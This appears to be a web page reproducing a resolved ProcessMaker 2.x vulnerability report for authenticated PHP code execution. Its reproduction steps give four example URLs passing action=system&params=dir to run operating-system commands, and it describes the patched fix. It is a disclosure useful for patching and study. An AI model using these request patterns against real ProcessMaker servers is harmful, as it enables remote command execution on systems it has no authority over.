ProcessMaker 2.x 认证用户PHP代码执行漏洞

关键漏洞信息 ID: 0013436 项目: ProcessMaker (Community) 类别: XI ... Other 视图状态: public 提交日期: 2013-10-24 08:24 最后更新: 2014-05-07 18:54 报告者: lcoles 指派给: julicesar 优先级: high 严重性: major 可重现性: always 状态: resolved 解决情况: fixed 平台: OS 产品版本: ProcessMaker v 2.0.45 目标版本: Fixed in Version 摘要 0013436: ProcessMaker 2.x Authenticated PHP Code Execution 描述 The "neoclassic" skin for ProcessMaker allows any authenticated user to execute arbitrary PHP code under the context of the web server user. 重现步骤 http://processmaker.example.com/sysworkflow/en/neoclassic/appFolder/appFolderAjax.php?action=system¶ms=dir [] http://processmaker.example.com/sysworkflow/en/neoclassic/cases/cases/StarterPage_Ajax.php?action=system¶ms=dir [] http://processmaker.example.com/sysworkflow/en/neoclassic/cases/caseNotesAjax.php?action=system¶ms=dir [] http://processmaker.example.com/sysworkflow/en/neoclassic/cases/cases_SchedulerGetPlugins.php?action=system¶ms=dir [] 其他信息 The vulnerable skin is installed by default in ProcessMaker version 2.x and cannot be removed via the web interface. 解决方案 A new method was implemented to validate if it's a user custom function or a system function (G::isUserFunction). Available on version 2.5.2.

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

ProcessMaker 2.x 认证用户PHP代码执行漏洞

目标达成感谢每一位支持者 — 我们达成了 100% 目标！